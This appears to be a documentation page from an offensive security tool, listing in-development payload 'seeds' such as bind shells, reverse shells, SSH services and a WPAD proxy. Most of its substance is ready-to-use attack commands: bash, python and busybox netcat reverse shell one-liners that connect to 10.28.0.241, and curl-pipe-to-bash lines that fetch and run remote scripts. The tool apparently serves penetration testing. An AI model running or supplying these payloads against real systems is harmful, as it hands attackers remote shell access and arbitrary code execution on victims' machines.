Seeds that are not tested or finished.
This is the multi-page printable view of this section. Click here to print.
In Development Seeds
These seeds are not ready for production and may never be.
- 1: Build MDaaS
- 2: Bind Shell
- 3: BusyBox Reverse Shell
- 4: Detect platform
- 5: List Payloads
- 6: Reverse Shell
- 7: Simple SSH
- 8: Simple SSH Service
- 9: WPAD
1 - Build MDaaS
Build random binaries
2 - Bind Shell
Requires bind-shell in static dir
curl xodbox/bind.sh|bash
3 - BusyBox Reverse Shell
BusyBox Reverse Shell
List Payloads
# bash
bash -i >& /dev/tcp/10.28.0.241/9091 0>&1
0<&196;exec 196<>/dev/tcp/10.28.0.241/9091; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.28.0.241/9091 0<&1 2>&1
#python
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.28.0.241",9091));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
#busybox nc
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.28.0.241 9092 >/tmp/f
4 - Detect platform
detect platform
5 - List Payloads
List payloads
6 - Reverse Shell
Requires bind-shell in static dir
7 - Simple SSH
Simple SSH (requires build of simple ssh server in static dir)
curl xodbox/ssh.sh|bash
8 - Simple SSH Service
Simple SSH Service (requires build of simple ssh server in static dir)
9 - WPAD
Returns a WPAD config file (Javascript).
WPAD Proxy. Not really useful at the moment. Should be more useful in the future